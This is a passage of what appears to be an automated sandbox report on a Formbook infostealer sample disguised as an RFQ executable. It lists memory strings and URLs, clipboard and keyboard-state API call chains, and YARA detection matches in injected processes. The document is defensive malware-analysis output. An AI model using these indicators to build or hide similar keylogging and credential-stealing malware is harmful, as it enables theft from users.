          Source: explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
          Source: systray.exe, 00000004.00000002.3877340789.000000000574F000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://octagonal-waiter-408.notion.site/Notion-publish-test-5ffca584256043babdad0fd9159cb223?pvs=4
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.com
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000002.3882013964.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290803241.000000000899E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/bat
          Source: explorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.stacker.com/arizona/phoenix
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
          Source: explorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.yelp.com
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0015425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 1_2_0015425A
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00154458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 1_2_00154458
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00140219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState | 1_2_00140219
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0016CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 1_2_0016CDAC

          E-Banking Fraud

          Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
